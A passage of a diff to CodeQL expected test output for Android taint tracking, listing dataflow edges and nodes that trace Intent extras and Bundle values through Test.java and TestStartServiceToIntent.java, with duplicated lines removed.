TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:68:18:68:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:68:18:68:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:73:31:73:43 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:74:18:74:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:74:18:74:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:79:33:79:45 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:80:18:80:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:80:18:80:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:85:30:85:42 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:86:18:86:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:86:18:86:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:90:35:90:47 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | provenance | | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | -| TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | | TestStartServiceToIntent.java:91:18:91:23 | intent : Intent [android.content.Intent.extras, ] : String | TestStartServiceToIntent.java:91:18:91:46 | getStringExtra(...) | provenance | MaD:43 | nodes | Test.java:22:19:22:32 | it : Set [] : String | semmle.label | it : Set [] : String | @@ -2432,142 +1848,73 @@ nodes | Test.java:22:44:22:56 | iterator(...) : Iterator [] : String | semmle.label | iterator(...) : Iterator [] : String | | Test.java:22:44:22:63 | next(...) : String | semmle.label | next(...) : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | | Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:23:26:23:33 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : ArrayList | semmle.label | i : Intent [android.content.Intent.extras, ] : ArrayList | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | i : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | i : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | i : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Intent | semmle.label | i : Intent [android.content.Intent.extras, ] : Intent | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | i : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Number | semmle.label | i : Intent [android.content.Intent.extras, ] : Number | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Object | semmle.label | i : Intent [android.content.Intent.extras, ] : Object | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | i : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | i : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String | semmle.label | i : Intent [android.content.Intent.extras, ] : String | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : String[] | semmle.label | i : Intent [android.content.Intent.extras, ] : String[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | i : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | i : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : char[] | semmle.label | i : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : double[] | semmle.label | i : Intent [android.content.Intent.extras, ] : double[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : float[] | semmle.label | i : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : int[] | semmle.label | i : Intent [android.content.Intent.extras, ] : int[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : long[] | semmle.label | i : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | | Test.java:23:45:23:45 | i : Intent [android.content.Intent.extras, ] : short[] | semmle.label | i : Intent [android.content.Intent.extras, ] : short[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | semmle.label | getExtras(...) : Bundle [] : ArrayList | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : ArrayList | semmle.label | getExtras(...) : Bundle [] : ArrayList | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | semmle.label | getExtras(...) : Bundle [] : Boolean | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Boolean | semmle.label | getExtras(...) : Bundle [] : Boolean | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | semmle.label | getExtras(...) : Bundle [] : Bundle | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Bundle | semmle.label | getExtras(...) : Bundle [] : Bundle | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | semmle.label | getExtras(...) : Bundle [] : CharSequence | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence | semmle.label | getExtras(...) : Bundle [] : CharSequence | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | semmle.label | getExtras(...) : Bundle [] : CharSequence[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : CharSequence[] | semmle.label | getExtras(...) : Bundle [] : CharSequence[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | semmle.label | getExtras(...) : Bundle [] : Intent | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Intent | semmle.label | getExtras(...) : Bundle [] : Intent | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | semmle.label | getExtras(...) : Bundle [] : IntentSender | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : IntentSender | semmle.label | getExtras(...) : Bundle [] : IntentSender | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | semmle.label | getExtras(...) : Bundle [] : Number | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Number | semmle.label | getExtras(...) : Bundle [] : Number | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | semmle.label | getExtras(...) : Bundle [] : Object | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Object | semmle.label | getExtras(...) : Bundle [] : Object | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | semmle.label | getExtras(...) : Bundle [] : Parcelable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable | semmle.label | getExtras(...) : Bundle [] : Parcelable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | semmle.label | getExtras(...) : Bundle [] : Parcelable[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Parcelable[] | semmle.label | getExtras(...) : Bundle [] : Parcelable[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | semmle.label | getExtras(...) : Bundle [] : Serializable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : Serializable | semmle.label | getExtras(...) : Bundle [] : Serializable | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | semmle.label | getExtras(...) : Bundle [] : String[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : String[] | semmle.label | getExtras(...) : Bundle [] : String[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | semmle.label | getExtras(...) : Bundle [] : boolean[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : boolean[] | semmle.label | getExtras(...) : Bundle [] : boolean[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | semmle.label | getExtras(...) : Bundle [] : byte[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : byte[] | semmle.label | getExtras(...) : Bundle [] : byte[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | semmle.label | getExtras(...) : Bundle [] : char[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : char[] | semmle.label | getExtras(...) : Bundle [] : char[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | semmle.label | getExtras(...) : Bundle [] : double[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : double[] | semmle.label | getExtras(...) : Bundle [] : double[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | semmle.label | getExtras(...) : Bundle [] : float[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : float[] | semmle.label | getExtras(...) : Bundle [] : float[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | semmle.label | getExtras(...) : Bundle [] : int[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : int[] | semmle.label | getExtras(...) : Bundle [] : int[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : long[] | semmle.label | getExtras(...) : Bundle [] : long[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : long[] | semmle.label | getExtras(...) : Bundle [] : long[] | -| Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | semmle.label | getExtras(...) : Bundle [] : short[] | | Test.java:23:45:23:57 | getExtras(...) : Bundle [] : short[] | semmle.label | getExtras(...) : Bundle [] : short[] | | Test.java:24:19:24:30 | b : BaseBundle [] : String | semmle.label | b : BaseBundle [] : String | | Test.java:24:19:24:30 | b : Bundle [] : Object | semmle.label | b : Bundle [] : Object | @@ -2603,23 +1950,19 @@ nodes | Test.java:41:45:41:73 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:41:65:41:72 | source(...) : String | semmle.label | source(...) : String | | Test.java:42:10:42:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : String | -| Test.java:42:10:42:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : String | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : String | | Test.java:42:21:42:22 | in : Intent [android.content.Intent.extras, ] : String | semmle.label | in : Intent [android.content.Intent.extras, ] : String | | Test.java:43:9:43:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:43:19:43:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:43:36:43:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:48:16:48:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:48:24:48:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:48:45:48:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:48:67:48:74 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:49:10:49:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | -| Test.java:49:10:49:23 | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | new Intent(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:49:21:49:22 | in : Intent [android.content.Intent.extras, ] : Object | semmle.label | in : Intent [android.content.Intent.extras, ] : Object | | Test.java:50:9:50:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:50:21:50:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:50:38:50:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:55:13:55:25 | (...)... : Uri | semmle.label | (...)... : Uri | | Test.java:55:18:55:25 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:56:10:56:29 | new Intent(...) : Intent [android.content.Intent.data] : Uri | semmle.label | new Intent(...) : Intent [android.content.Intent.data] : Uri | @@ -2645,30 +1988,24 @@ nodes | Test.java:83:22:83:43 | (...)... : CharSequence | semmle.label | (...)... : CharSequence | | Test.java:83:36:83:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:84:10:84:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:84:10:84:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:84:37:84:38 | in : CharSequence | semmle.label | in : CharSequence | | Test.java:85:9:85:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:85:21:85:41 | getIntent_extras(...) : Bundle [] : CharSequence | semmle.label | getIntent_extras(...) : Bundle [] : CharSequence | | Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:85:38:85:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:90:22:90:43 | (...)... : IntentSender | semmle.label | (...)... : IntentSender | | Test.java:90:36:90:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:91:10:91:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:91:10:91:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:91:43:91:44 | in : IntentSender | semmle.label | in : IntentSender | | Test.java:92:9:92:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:92:21:92:41 | getIntent_extras(...) : Bundle [] : IntentSender | semmle.label | getIntent_extras(...) : Bundle [] : IntentSender | | Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | out : Intent [android.content.Intent.extras, ] : IntentSender | -| Test.java:92:38:92:40 | out : Intent [android.content.Intent.extras, ] : IntentSender | semmle.label | out : Intent [android.content.Intent.extras, ] : IntentSender | | Test.java:97:16:97:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:97:24:97:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:98:10:98:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | -| Test.java:98:10:98:45 | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | semmle.label | createChooser(...) : Intent [android.content.Intent.extras, ] : Intent | | Test.java:98:31:98:32 | in : Intent | semmle.label | in : Intent | | Test.java:99:9:99:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:99:21:99:41 | getIntent_extras(...) : Bundle [] : Intent | semmle.label | getIntent_extras(...) : Bundle [] : Intent | | Test.java:99:38:99:40 | out : Intent 